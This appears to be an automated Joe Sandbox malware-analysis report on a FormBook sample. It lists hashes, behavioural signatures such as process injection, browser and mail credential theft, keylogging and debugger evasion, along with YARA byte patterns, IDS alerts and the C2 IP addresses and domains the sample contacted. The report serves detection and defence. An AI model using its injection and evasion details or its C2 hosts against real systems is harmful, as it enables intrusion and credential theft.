Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Z6s208B9QX.exe

Overview

General Information

Sample name:Z6s208B9QX.exe
renamed because original name is a hash value
Original sample name:e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5.exe
Analysis ID:1529061
MD5:09bfd7f979770cde56456734d6d1ff8d
SHA1:15a1450424a5bf0320b429d7aaa71dc724502d89
SHA256:e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Z6s208B9QX.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\Z6s208B9QX.exe" MD5: 09BFD7F979770CDE56456734D6D1FF8D)
    • svchost.exe (PID: 632 cmdline: "C:\Users\user\Desktop\Z6s208B9QX.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UCAmCgWJyh.exe (PID: 416 cmdline: "C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 1568 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • UCAmCgWJyh.exe (PID: 3000 cmdline: "C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2692 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          8.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16472:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          8.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            8.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ParentImage: C:\Users\user\Desktop\Z6s208B9QX.exe, ParentProcessId: 3604, ParentProcessName: Z6s208B9QX.exe, ProcessCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ProcessId: 632, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ParentImage: C:\Users\user\Desktop\Z6s208B9QX.exe, ParentProcessId: 3604, ParentProcessName: Z6s208B9QX.exe, ProcessCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ProcessId: 632, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:54:55.058220+020028554651A Network Trojan was detected192.168.2.11499813.33.130.19080TCP
            2024-10-08T15:55:19.067831+020028554651A Network Trojan was detected192.168.2.114998523.224.37.7680TCP
            2024-10-08T15:55:33.552417+020028554651A Network Trojan was detected192.168.2.114998920.184.53.16280TCP
            2024-10-08T15:55:47.945936+020028554651A Network Trojan was detected192.168.2.1149993199.192.21.16980TCP
            2024-10-08T15:56:01.506046+020028554651A Network Trojan was detected192.168.2.114999781.2.196.1980TCP
            2024-10-08T15:56:15.481765+020028554651A Network Trojan was detected192.168.2.1150001107.163.130.24980TCP
            2024-10-08T15:56:38.340684+020028554651A Network Trojan was detected192.168.2.1150005103.21.221.480TCP
            2024-10-08T15:56:51.500642+020028554651A Network Trojan was detected192.168.2.11500093.33.130.19080TCP
            2024-10-08T15:57:04.975729+020028554651A Network Trojan was detected192.168.2.11500133.33.130.19080TCP
            2024-10-08T15:57:18.137011+020028554651A Network Trojan was detected192.168.2.115001715.197.204.5680TCP
            2024-10-08T15:57:31.437191+020028554651A Network Trojan was detected192.168.2.1150021198.252.106.19180TCP
            2024-10-08T15:58:06.365310+020028554651A Network Trojan was detected192.168.2.115002543.154.104.24780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:55:11.208615+020028554641A Network Trojan was detected192.168.2.114998223.224.37.7680TCP
            2024-10-08T15:55:13.745510+020028554641A Network Trojan was detected192.168.2.114998323.224.37.7680TCP
            2024-10-08T15:55:16.324503+020028554641A Network Trojan was detected192.168.2.114998423.224.37.7680TCP
            2024-10-08T15:55:25.356025+020028554641A Network Trojan was detected192.168.2.114998620.184.53.16280TCP
            2024-10-08T15:55:27.907328+020028554641A Network Trojan was detected192.168.2.114998720.184.53.16280TCP
            2024-10-08T15:55:31.024077+020028554641A Network Trojan was detected192.168.2.114998820.184.53.16280TCP
            2024-10-08T15:55:39.615131+020028554641A Network Trojan was detected192.168.2.1149990199.192.21.16980TCP
            2024-10-08T15:55:42.829677+020028554641A Network Trojan was detected192.168.2.1149991199.192.21.16980TCP
            2024-10-08T15:55:45.444662+020028554641A Network Trojan was detected192.168.2.1149992199.192.21.16980TCP
            2024-10-08T15:55:53.697059+020028554641A Network Trojan was detected192.168.2.114999481.2.196.1980TCP
            2024-10-08T15:55:56.268746+020028554641A Network Trojan was detected192.168.2.114999581.2.196.1980TCP
            2024-10-08T15:55:58.941631+020028554641A Network Trojan was detected192.168.2.114999681.2.196.1980TCP
            2024-10-08T15:56:07.828208+020028554641A Network Trojan was detected192.168.2.1149998107.163.130.24980TCP
            2024-10-08T15:56:10.342789+020028554641A Network Trojan was detected192.168.2.1149999107.163.130.24980TCP
            2024-10-08T15:56:13.128271+020028554641A Network Trojan was detected192.168.2.1150000107.163.130.24980TCP
            2024-10-08T15:56:30.980849+020028554641A Network Trojan was detected192.168.2.1150002103.21.221.480TCP
            2024-10-08T15:56:33.258500+020028554641A Network Trojan was detected192.168.2.1150003103.21.221.480TCP
            2024-10-08T15:56:35.789412+020028554641A Network Trojan was detected192.168.2.1150004103.21.221.480TCP
            2024-10-08T15:56:44.908726+020028554641A Network Trojan was detected192.168.2.11500063.33.130.19080TCP
            2024-10-08T15:56:46.407490+020028554641A Network Trojan was detected192.168.2.11500073.33.130.19080TCP
            2024-10-08T15:56:48.996607+020028554641A Network Trojan was detected192.168.2.11500083.33.130.19080TCP
            2024-10-08T15:56:57.025799+020028554641A Network Trojan was detected192.168.2.11500103.33.130.19080TCP
            2024-10-08T15:57:00.480822+020028554641A Network Trojan was detected192.168.2.11500113.33.130.19080TCP
            2024-10-08T15:57:02.113014+020028554641A Network Trojan was detected192.168.2.11500123.33.130.19080TCP
            2024-10-08T15:57:10.496832+020028554641A Network Trojan was detected192.168.2.115001415.197.204.5680TCP
            2024-10-08T15:57:13.035316+020028554641A Network Trojan was detected192.168.2.115001515.197.204.5680TCP
            2024-10-08T15:57:15.596242+020028554641A Network Trojan was detected192.168.2.115001615.197.204.5680TCP
            2024-10-08T15:57:23.793559+020028554641A Network Trojan was detected192.168.2.1150018198.252.106.19180TCP
            2024-10-08T15:57:26.356859+020028554641A Network Trojan was detected192.168.2.1150019198.252.106.19180TCP
            2024-10-08T15:57:28.949746+020028554641A Network Trojan was detected192.168.2.1150020198.252.106.19180TCP
            2024-10-08T15:57:38.673484+020028554641A Network Trojan was detected192.168.2.115002243.154.104.24780TCP
            2024-10-08T15:57:41.219310+020028554641A Network Trojan was detected192.168.2.115002343.154.104.24780TCP
            2024-10-08T15:57:43.938046+020028554641A Network Trojan was detected192.168.2.115002443.154.104.24780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Z6s208B9QX.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Z6s208B9QX.exeJoe Sandbox ML: detected
            Source: Z6s208B9QX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UCAmCgWJyh.exe, 0000000A.00000000.1650413823.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp, UCAmCgWJyh.exe, 0000000D.00000000.1799667591.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0054C340 FindFirstFileW,FindNextFileW,FindClose,11_2_0054C340
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax11_2_00539A60
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then pop edi11_2_0053DF50
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov ebx, 00000004h11_2_045604E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49993 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49997 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50001 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49992 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49981 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49995 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50003 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49983 -> 23.224.37.76:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50005 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49985 -> 23.224.37.76:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50024 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50016 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50021 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49984 -> 23.224.37.76:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49988 -> 20.184.53.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50020 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50014 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50015 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49991 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50000 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50013 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50025 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50017 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49990 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50022 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49986 -> 20.184.53.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49998 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50002 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50006 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50019 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50012 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50004 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50018 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50023 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49982 -> 23.224.37.76:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49996 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50008 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50009 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49989 -> 20.184.53.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49999 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49987 -> 20.184.53.162:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50007 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50010 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50011 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49994 -> 81.2.196.19:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.93187.xyz
            Source: DNS query: www.broomeorchard.xyz
            Source: DNS query: www.suarahati20.xyz
            Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
            Source: Joe Sandbox ViewASN Name: HAWKHOSTCA HAWKHOSTCA
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
